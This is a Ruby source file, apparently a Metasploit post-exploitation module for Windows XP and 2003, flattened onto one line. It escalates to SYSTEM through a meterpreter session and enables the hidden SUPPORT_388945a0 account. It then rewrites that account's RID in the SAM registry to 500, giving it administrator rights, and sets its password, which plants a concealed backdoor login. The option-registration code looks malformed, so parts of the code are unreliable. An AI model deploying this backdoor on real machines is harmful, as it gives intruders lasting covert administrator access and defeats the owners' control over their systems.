require 'msf/core' require 'rex' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Trojanize Support Account', 'Description' => %q{ This module enables alternative access to servers and workstations by modifying the support account's properties. It will enable the account for remote access as the administrator user while taking advantage of some weird behavior in lusrmgr.msc. It will check if sufficient privileges are available for registry operations, otherwise it exits. }, 'License' => MSF_LICENSE, 'Author' => 'salcho ', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => [ '' ] )) register_options( ['PASSWORD', [true, 'Password of the support user account', 'password']),'GETSYSTEM', [true, 'Attempt to get SYSTEM privilege on the target host.', false]) ], self.class) end def run reg_key = 'HKLM\\SAM\\SAM\\Domains\\Account\\Users' unless (is_system?()) if (datastore['GETSYSTEM']) print_status("Trying to get system...") res = session.priv.getsystem unless res[0] print_error("Unable to get system! You need to run this script.") return else print_good("Got system!") end else print_error("You need to run this script as system!") return end end wver = sysinfo()["OS"] if wver !~ /Windows XP|Windows .NET|Windows 2003/ print_error("#{wver} is not supported") return end print_status("Target OS is #{wver}") names_key = registry_enumkeys(reg_key + '\\Names') unless names_key print_error("Couldn't access registry keys") return end rid = -1 print_status('Harvesting users...') names_key.each do |name| if name.include?'SUPPORT_388945a0' print_good("Found #{name} account!") skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", "") if not skey print_error("Couldn't open user's key") return end rid = skey['Type'] print_status("Target RID is #{rid}") end end if rid == -1 print_error("Couldn't get user's RID...") return end users_key = registry_enumkeys(reg_key) users_key.each do |r| next if r.to_i(16) != rid f = registry_getvaldata(reg_key + "\\#{r}", "F") if check_active(f) print_status("Account is disabled, activating...") f[0x38] = ["10"].pack("H") else print_error("Target account is already enabled") end print_status("Swapping RIDs...!") # Overwrite RID to 500 (as administrator) f = swap_rid(f, 500) open_key = registry_setvaldata(reg_key + "\\#{r}", "F", f, "REG_BINARY") unless open_key print_error("Can't write to registry... Something's wrong!") return end print_status("Setting password to #{datastore['PASSWORD']}") cmd = cmd_exec('cmd.exe', "/c net user support_388945a0 #{datastore['PASSWORD']}") vprint_status("#{cmd}") end end def check_active(f) if f[0x38].unpack("H*")[0].to_i == 11 return true else return false end end def swap_rid(f, rid) # This function will set hex format to a given RID integer hex = [("%04x" % rid).scan(/.{2}/).reverse.join].pack("H*") # Overwrite new RID at offset 0x30 f[0x30, 2] = hex return f end end